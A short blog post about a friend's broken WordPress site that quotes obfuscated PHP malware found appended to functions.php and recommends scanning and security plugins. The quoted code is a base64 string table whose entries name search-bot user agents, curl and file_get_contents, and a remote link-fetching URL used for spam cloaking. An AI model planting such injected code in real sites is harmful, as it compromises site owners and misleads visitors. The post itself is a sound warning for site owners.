Garbage code because of malware on your wordpress website

Recently one of my friends called me with a problem. He was not able to access his WordPress website, not even WordPress admin. He was afraid that his website was compromised and hacked.

When I opened his website, I saw a random PHP code on display. Something like this –

<!--? function _1634693657($i){$a=Array('I' .'2dvb2d' .'sZSN' .'p','I' .'21zbmJvdCNp','I2' .'Jpbmcja' .'Q==','I' .'3N' .'s' .'dX' .'J' .'wI' .'2k' .'=','' .'I2FzayN' .'p','I3N' .'lem5hbSNp','I2Fs' .'d' .'G' .'F2aXN0Y' .'SNp','SFRU' .'UF9VU0VSX0FHRU5U','aHR0cDov' .'Lw==','','SFRU' .'UF9IT1N' .'U','UkVRVUVT' .'V' .'F' .'9' .'VUkk=','aHR0cHM6Ly8=','','' .'d3d3Lg' .'==','','c' .'WRu','aHR0cDov' .'L2NoZWNraW5' .'nbG' .'l' .'u' .'a3MuY29t' .'L' .'2Nvb' .'n' .'Rl' .'bnRzL2xp' .'b' .'mtzaW4uc' .'GhwP21kN' .'T0=','JnVhPQ==','' .'SFRUUF9VU0VS' .'X0FHRU5U','JnJl' .'Zj0=','SFRUU' .'F' .'9S' .'RUZFUkVS','Jm' .'lw' .'PQ' .'==','UkV' .'NT' .'1R' .'FX0FERFI=','JnV' .'ya' .'T0' .'=','' .'UkVRVUVTVF9' .'VUkk=','Y' .'3VybF9' .'pb' .'ml0','YWxsb' .'3' .'dfdXJs' .'X' .'2' .'Zv' .'cGVu','Z' .'m' .'lsZV9nZXRfY' .'29u' .'dGV' .'udHM' .'=','' .'Zm' .'9w' .'ZW' .'4=','c' .'g' .'==','IyguK' .'j4' .'pKFt' .'ePD5dKikoPC4qKSNVc20' .'=','IzxccypzY' .'3JpcHQuKn' .'Njc' .'m' .'lwdFxzK' .'j' .'4jVXNt','','' .'Izx' .'ccypzdHl' .'sZS4qc3R5b' .'GVccy' .'o+I1VzbQ==','','Iz' .'xc' .'cyphL' .'iphXHMqPi' .'N' .'Vc20=','','Izx' .'ccypoZWFk' .'LipoZWFkXHMqP' .'iNVc' .'20=','','Izxcc' .'yp0aX' .'R' .'s' .'Z' .'S4qd' .'Gl0' .'bGV' .'cc' .'yo+I1VzbQ' .'==','','IA==','c3' .'lzdGVt' .'X2J1ZmZlc' .'l9iYWNrX3Nvcn' .'Q=','IA' .'==','','Lg' .'=' .'=','LA' .'=' .'=','IQ' .'=' .'=','Pw=' .'=','' .'Og==','IA' .'==','IA==','' .'IA==','I' .'y' .'g' .'8XHMqL2Jv' .'ZHlccyo+fDxcc' .'yovaH' .'R' .'tbF' .'xzK' .'j4' .'pI2k=','IA' .'==','' .'Cg=' .'=','I' .'A' .'==','c3lzd' .'GVtX2J1ZmZ' .'l' .'cl9' .'iY' .'WN' .'r');return base64_decode($a[$i]);} ?-->

As I wasn’t fully convinced of hacking I thought of it may be because of any virus or malware, after a bit investigation and found that the WordPress website is trying to load but dying while loading functions.php in “wp-includes”. I asked him to check the file and he confirmed that the whole garbage code is written at the end of functions.php file.

Now it was confirmed that it was a malware attack. I asked hit to get his hosting scanned properly and get rid of any malware present. I hope this will help you if you face same kind of problem.

Also for precautionary measures, you can install some security scrutiny plugin, which will also detect malware, if present.

For example,

https://wordpress.org/plugins/sucuri-scanner/

https://wordpress.org/plugins/quttera-web-malware-scanner/